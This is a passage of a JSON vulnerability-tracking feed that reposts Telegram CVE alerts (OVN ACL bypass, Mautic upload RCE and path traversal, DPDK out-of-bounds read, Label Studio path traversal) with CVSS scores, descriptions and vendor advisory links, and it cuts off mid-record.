CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "9ee8f13f-77ad-4e04-ab25-b8b92442dd8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1090", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "a611fbfc-f541-401c-be8b-28b6204435eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1092", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "8879db32-a84d-456c-8822-217e5fda9421", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1094", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "ab4b456e-a5dc-44c0-b11b-8c6e58474bf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1083", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "072ce4a1-434f-4512-9707-5d6c1aa4e544", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1085", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "0d0143e8-5443-446e-94d5-e62ec49baaef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1097", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "7039d4c9-f13a-4b3c-811c-ad0741d3367e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1088", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "22664f59-9803-4956-98c0-0f5e8ae0a36d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4W2W-36VM-C8HF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5485", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-25773\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: This advisory addresses a file placement vulnerability that could allow assets to be uploaded to unintended directories on the server.\n\n  *  Improper Limitation of a Pathname to a Restricted Directory:\u00a0A vulnerability exists in the asset upload functionality that allows users to upload files to directories outside of the intended temporary directory.\n\ud83d\udccf Published: 2025-02-26T11:48:33.383Z\n\ud83d\udccf Modified: 2025-02-26T11:56:45.572Z\n\ud83d\udd17 References:\n1. https://github.com/mautic/mautic/security/advisories/GHSA-4w2w-36vm-c8hf", "creation_timestamp": "2025-02-26T12:31:54.000000Z"}, {"uuid": "38e921a5-a38a-4d55-8ee4-ea4bc7934ab1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73GX-X7R9-77X2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5484", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-47051\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L)\n\ud83d\udd39 Description: This advisory addresses two critical security vulnerabilities present in Mautic versions before 5.2.3. These vulnerabilities could be exploited by authenticated users.\n\n  *  Remote Code Execution (RCE) via Asset Upload:\u00a0A Remote Code Execution vulnerability has been identified in the asset upload functionality. Insufficient enforcement of allowed file extensions allows an attacker to bypass restrictions and upload executable files, such as PHP scripts.\n\n\n  *  Path Traversal File Deletion:\u00a0A Path Traversal vulnerability exists in the upload validation process. Due to improper handling of path components, an authenticated user can manipulate the file deletion process to delete arbitrary files on the host system.\n\ud83d\udccf Published: 2025-02-26T12:01:26.374Z\n\ud83d\udccf Modified: 2025-02-26T12:01:26.374Z\n\ud83d\udd17 References:\n1. https://github.com/mautic/mautic/security/advisories/GHSA-73gx-x7r9-77x2\n2. https://owasp.org/www-community/attacks/Code_Injection\n3. https://owasp.org/www-community/attacks/Path_Traversal", "creation_timestamp": "2025-02-26T12:31:53.000000Z"}, {"uuid": "849162d9-b8d0-4ca6-8d65-0ee008fc72fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0221", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5486", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-02-26T11:56:36.361Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/security/cve/CVE-2024-11614\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-02-26T12:31:55.000000Z"}, {"uuid": "213a7baf-7463-4c28-bd4e-11937c8f7a78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0211", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5486", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-02-26T11:56:36.361Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/security/cve/CVE-2024-11614\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-02-26T12:31:55.000000Z"}, {"uuid": "fdb09e55-f451-47b2-b281-3bd026285ef2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0208", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5486", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-02-26T11:56:36.361Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/security/cve/CVE-2024-11614\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-02-26T12:31:55.000000Z"}, {"uuid": "585c88e8-9992-4c09-bd9d-07b3adf7c3e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0222", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5486", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-02-26T11:56:36.361Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/security/cve/CVE-2024-11614\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-02-26T12:31:55.000000Z"}, {"uuid": "a876ead3-d4f3-4a75-8902-3cb6e683dd03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0210", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5486", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-02-26T11:56:36.361Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/security/cve/CVE-2024-11614\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-02-26T12:31:55.000000Z"}, {"uuid": "152c7ada-ef32-4419-a786-5d4619a9cee5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0209", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5486", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-02-26T11:56:36.361Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/security/cve/CVE-2024-11614\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-02-26T12:31:55.000000Z"}, {"uuid": "1782d06f-41b1-4d77-8f5d-81f0d50a62f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RGV9-W7JP-M23G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5577", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25295\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Label Studio is an open source data labeling tool. A path traversal vulnerability in Label Studio SDK versions prior to 1.0.10 allows unauthorized file access outside the intended directory structure. The flaw exists in the VOC, COCO and YOLO export functionalities. These functions invoke a `download` function on the `label-studio-sdk` python package, which fails to validate file paths when processing image references during task exports. By creating tasks with path traversal sequences in the image field, an attacker can force the application to read files from arbitrary server filesystem locations when exporting projects in any of the 